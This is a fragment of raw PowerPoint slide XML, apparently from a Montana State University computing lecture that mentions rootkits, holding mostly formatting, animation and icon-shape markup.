          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150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Gianforte School of Computing </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rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>E-mail: fangtian.zhong@montana.edu</a:t>
            </a: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a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311785" y="46355"/>
            <a:ext cx="2063115" cy="1447165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId13"/>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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>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0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28"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P spid="5" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="25"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Rootkit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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132205" y="1301750"/>
            <a:ext cx="9928225" cy="4780280"/>
            <a:chOff x="998510" y="1183843"/>
            <a:chExt cx="9928225" cy="4780280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 215"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="998510" y="1333068"/>
              <a:ext cx="9928225" cy="4631055"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1245 w 1301"/>
                <a:gd name="T1" fmla="*/ 536 h 536"/>
                <a:gd name="T2" fmla="*/ 56 w 1301"/>
                <a:gd name="T3" fmla="*/ 536 h 536"/>
                <a:gd name="T4" fmla="*/ 0 w 1301"/>
                <a:gd name="T5" fmla="*/ 480 h 536"/>
                <a:gd name="T6" fmla="*/ 0 w 1301"/>
                <a:gd name="T7" fmla="*/ 56 h 536"/>
                <a:gd name="T8" fmla="*/ 56 w 1301"/>
                <a:gd name="T9" fmla="*/ 0 h 536"/>
                <a:gd name="T10" fmla="*/ 119 w 1301"/>
                <a:gd name="T11" fmla="*/ 0 h 536"/>
                <a:gd name="T12" fmla="*/ 119 w 1301"/>
                <a:gd name="T13" fmla="*/ 8 h 536"/>
                <a:gd name="T14" fmla="*/ 56 w 1301"/>
                <a:gd name="T15" fmla="*/ 8 h 536"/>
                <a:gd name="T16" fmla="*/ 8 w 1301"/>
                <a:gd name="T17" fmla="*/ 56 h 536"/>
                <a:gd name="T18" fmla="*/ 8 w 1301"/>
                <a:gd name="T19" fmla="*/ 480 h 536"/>
                <a:gd name="T20" fmla="*/ 56 w 1301"/>
                <a:gd name="T21" fmla="*/ 528 h 536"/>
                <a:gd name="T22" fmla="*/ 1245 w 1301"/>
                <a:gd name="T23" fmla="*/ 528 h 536"/>
                <a:gd name="T24" fmla="*/ 1293 w 1301"/>
                <a:gd name="T25" fmla="*/ 480 h 536"/>
                <a:gd name="T26" fmla="*/ 1293 w 1301"/>
                <a:gd name="T27" fmla="*/ 56 h 536"/>
                <a:gd name="T28" fmla="*/ 1245 w 1301"/>
                <a:gd name="T29" fmla="*/ 8 h 536"/>
                <a:gd name="T30" fmla="*/ 354 w 1301"/>
                <a:gd name="T31" fmla="*/ 8 h 536"/>
                <a:gd name="T32" fmla="*/ 354 w 1301"/>
                <a:gd name="T33" fmla="*/ 0 h 536"/>
                <a:gd name="T34" fmla="*/ 1245 w 1301"/>
                <a:gd name="T35" fmla="*/ 0 h 536"/>
                <a:gd name="T36" fmla="*/ 1301 w 1301"/>
                <a:gd name="T37" fmla="*/ 56 h 536"/>
                <a:gd name="T38" fmla="*/ 1301 w 1301"/>
                <a:gd name="T39" fmla="*/ 480 h 536"/>
                <a:gd name="T40" fmla="*/ 1245 w 1301"/>
                <a:gd name="T41" fmla="*/ 536 h 5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01" h="536">
                  <a:moveTo>
                    <a:pt x="1245" y="536"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="536"/>
                    <a:pt x="56" y="536"/>
                    <a:pt x="56" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="536"/>
                    <a:pt x="0" y="511"/>
                    <a:pt x="0" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="56"/>
                    <a:pt x="0" y="56"/>
                    <a:pt x="0" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="25" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="0"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="119" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="8"/>
                    <a:pt x="119" y="8"/>
                    <a:pt x="119" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="8"/>
                    <a:pt x="56" y="8"/>
                    <a:pt x="56" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="8"/>
                    <a:pt x="8" y="30"/>
                    <a:pt x="8" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="480"/>
                    <a:pt x="8" y="480"/>
                    <a:pt x="8" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="506"/>
                    <a:pt x="30" y="528"/>
                    <a:pt x="56" y="528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="528"/>
                    <a:pt x="1245" y="528"/>
                    <a:pt x="1245" y="528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="528"/>
                    <a:pt x="1293" y="506"/>
                    <a:pt x="1293" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1293" y="56"/>
                    <a:pt x="1293" y="56"/>
                    <a:pt x="1293" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1293" y="30"/>
                    <a:pt x="1271" y="8"/>
                    <a:pt x="1245" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="8"/>
                    <a:pt x="354" y="8"/>
                    <a:pt x="354" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="0"/>
                    <a:pt x="354" y="0"/>
                    <a:pt x="354" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="1245" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1276" y="0"/>
                    <a:pt x="1301" y="25"/>
                    <a:pt x="1301" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="480"/>
                    <a:pt x="1301" y="480"/>
                    <a:pt x="1301" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="511"/>
                    <a:pt x="1276" y="536"/>
                    <a:pt x="1245" y="53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9" name="Rectangle 216"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1768736" y="1481527"/>
              <a:ext cx="38164"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1" name="Rectangle 218"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3560379" y="1481527"/>
              <a:ext cx="40940" cy="28450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:pr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3" name="Freeform 219"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1872127" y="1278214"/>
              <a:ext cx="179719"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9" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="22" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="10"/>
                    <a:pt x="19"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4" name="Freeform 220"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2215606"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7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3" y="0"/>
                    <a:pt x="29" y="6"/>
                    <a:pt x="29" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="22"/>
                    <a:pt x="23" y="28"/>
                    <a:pt x="15" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="15" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="7" y="10"/>
                    <a:pt x="7" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7"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5" name="Freeform 221"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2910197" y="1278214"/>
              <a:ext cx="182495" cy="191517"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 14 w 28"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 0 w 28"/>
                <a:gd name="T3" fmla="*/ 14 h 28"/>
                <a:gd name="T4" fmla="*/ 14 w 28"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 28 w 28"/>
                <a:gd name="T7" fmla="*/ 14 h 28"/>
                <a:gd name="T8" fmla="*/ 14 w 28"/>
                <a:gd name="T9" fmla="*/ 28 h 28"/>
                <a:gd name="T10" fmla="*/ 14 w 28"/>
                <a:gd name="T11" fmla="*/ 6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 28"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 14 w 28"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 22 w 28"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 14 w 28"/>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8" h="28">
                  <a:moveTo>
                    <a:pt x="14" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="28"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="6"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="14" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="28" y="6"/>
                    <a:pt x="28" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="22"/>
                    <a:pt x="22" y="28"/>
                    <a:pt x="14" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="14" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="14" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="22" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="10"/>
                    <a:pt x="18" y="6"/>
                    <a:pt x="14"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6" name="Freeform 222"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3252982" y="1278214"/>
              <a:ext cx="185271" cy="191517"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 15 w 29"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 0 w 29"/>
                <a:gd name="T3" fmla="*/ 14 h 28"/>
                <a:gd name="T4" fmla="*/ 15 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 29 w 29"/>
                <a:gd name="T7" fmla="*/ 14 h 28"/>
                <a:gd name="T8" fmla="*/ 15 w 29"/>
                <a:gd name="T9" fmla="*/ 28 h 28"/>
                <a:gd name="T10" fmla="*/ 15 w 29"/>
                <a:gd name="T11" fmla="*/ 6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 29"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 15 w 29"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 23 w 29"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 15 w 29"/>
                <a:gd name="T19" fmla="*/ 6 h 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29" h="28">
                  <a:moveTo>
                    <a:pt x="15" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="28"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="6"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="29" y="6"/>
                    <a:pt x="29" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="22"/>
                    <a:pt x="22" y="28"/>
                    <a:pt x="15" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="15" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="15" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="22"/>
                    <a:pt x="23" y="19"/>
                    <a:pt x="23" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="10"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="15" y="6"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 223"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2490389" y="1183843"/>
              <a:ext cx="324050" cy="326134"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 50"/>
                <a:gd name="T1" fmla="*/ 48 h 48"/>
                <a:gd name="T2" fmla="*/ 10 w 50"/>
                <a:gd name="T3" fmla="*/ 47 h 48"/>
                <a:gd name="T4" fmla="*/ 9 w 50"/>
                <a:gd name="T5" fmla="*/ 44 h 48"/>
                <a:gd name="T6" fmla="*/ 11 w 50"/>
                <a:gd name="T7" fmla="*/ 30 h 48"/>
                <a:gd name="T8" fmla="*/ 1 w 50"/>
                <a:gd name="T9" fmla="*/ 21 h 48"/>
                <a:gd name="T10" fmla="*/ 1 w 50"/>
                <a:gd name="T11" fmla="*/ 18 h 48"/>
                <a:gd name="T12" fmla="*/ 3 w 50"/>
                <a:gd name="T13" fmla="*/ 16 h 48"/>
                <a:gd name="T14" fmla="*/ 17 w 50"/>
                <a:gd name="T15" fmla="*/ 14 h 48"/>
                <a:gd name="T16" fmla="*/ 23 w 50"/>
                <a:gd name="T17" fmla="*/ 2 h 48"/>
                <a:gd name="T18" fmla="*/ 28 w 50"/>
                <a:gd name="T19" fmla="*/ 2 h 48"/>
                <a:gd name="T20" fmla="*/ 34 w 50"/>
                <a:gd name="T21" fmla="*/ 14 h 48"/>
                <a:gd name="T22" fmla="*/ 48 w 50"/>
                <a:gd name="T23" fmla="*/ 16 h 48"/>
                <a:gd name="T24" fmla="*/ 50 w 50"/>
                <a:gd name="T25" fmla="*/ 18 h 48"/>
                <a:gd name="T26" fmla="*/ 49 w 50"/>
                <a:gd name="T27" fmla="*/ 21 h 48"/>
                <a:gd name="T28" fmla="*/ 40 w 50"/>
                <a:gd name="T29" fmla="*/ 30 h 48"/>
                <a:gd name="T30" fmla="*/ 42 w 50"/>
                <a:gd name="T31" fmla="*/ 44 h 48"/>
                <a:gd name="T32" fmla="*/ 41 w 50"/>
                <a:gd name="T33" fmla="*/ 47 h 48"/>
                <a:gd name="T34" fmla="*/ 37 w 50"/>
                <a:gd name="T35" fmla="*/ 47 h 48"/>
                <a:gd name="T36" fmla="*/ 25 w 50"/>
                <a:gd name="T37" fmla="*/ 41 h 48"/>
                <a:gd name="T38" fmla="*/ 13 w 50"/>
                <a:gd name="T39" fmla="*/ 47 h 48"/>
                <a:gd name="T40" fmla="*/ 12 w 50"/>
                <a:gd name="T41" fmla="*/ 48 h 48"/>
                <a:gd name="T42" fmla="*/ 25 w 50"/>
                <a:gd name="T43" fmla="*/ 34 h 48"/>
                <a:gd name="T44" fmla="*/ 27 w 50"/>
                <a:gd name="T45" fmla="*/ 35 h 48"/>
                <a:gd name="T46" fmla="*/ 35 w 50"/>
                <a:gd name="T47" fmla="*/ 39 h 48"/>
                <a:gd name="T48" fmla="*/ 33 w 50"/>
                <a:gd name="T49" fmla="*/ 30 h 48"/>
                <a:gd name="T50" fmla="*/ 34 w 50"/>
                <a:gd name="T51" fmla="*/ 27 h 48"/>
                <a:gd name="T52" fmla="*/ 41 w 50"/>
                <a:gd name="T53" fmla="*/ 21 h 48"/>
                <a:gd name="T54" fmla="*/ 32 w 50"/>
                <a:gd name="T55" fmla="*/ 20 h 48"/>
                <a:gd name="T56" fmla="*/ 29 w 50"/>
                <a:gd name="T57" fmla="*/ 18 h 48"/>
                <a:gd name="T58" fmla="*/ 25 w 50"/>
                <a:gd name="T59" fmla="*/ 10 h 48"/>
                <a:gd name="T60" fmla="*/ 21 w 50"/>
                <a:gd name="T61" fmla="*/ 18 h 48"/>
                <a:gd name="T62" fmla="*/ 19 w 50"/>
                <a:gd name="T63" fmla="*/ 20 h 48"/>
                <a:gd name="T64" fmla="*/ 10 w 50"/>
                <a:gd name="T65" fmla="*/ 21 h 48"/>
                <a:gd name="T66" fmla="*/ 17 w 50"/>
                <a:gd name="T67" fmla="*/ 27 h 48"/>
                <a:gd name="T68" fmla="*/ 17 w 50"/>
                <a:gd name="T69" fmla="*/ 30 h 48"/>
                <a:gd name="T70" fmla="*/ 16 w 50"/>
                <a:gd name="T71" fmla="*/ 39 h 48"/>
                <a:gd name="T72" fmla="*/ 24 w 50"/>
                <a:gd name="T73" fmla="*/ 35 h 48"/>
                <a:gd name="T74" fmla="*/ 25 w 50"/>
                <a:gd name="T75" fmla="*/ 34 h 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50" h="48">
                  <a:moveTo>
                    <a:pt x="12" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="48"/>
                    <a:pt x="11" y="47"/>
                    <a:pt x="10" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="46"/>
                    <a:pt x="9" y="45"/>
                    <a:pt x="9" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="30"/>
                    <a:pt x="11" y="30"/>
                    <a:pt x="11" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="21"/>
                    <a:pt x="1" y="21"/>
                    <a:pt x="1" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="1" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="17"/>
                    <a:pt x="2" y="16"/>
                    <a:pt x="3" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="14"/>
                    <a:pt x="17" y="14"/>
                    <a:pt x="17" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
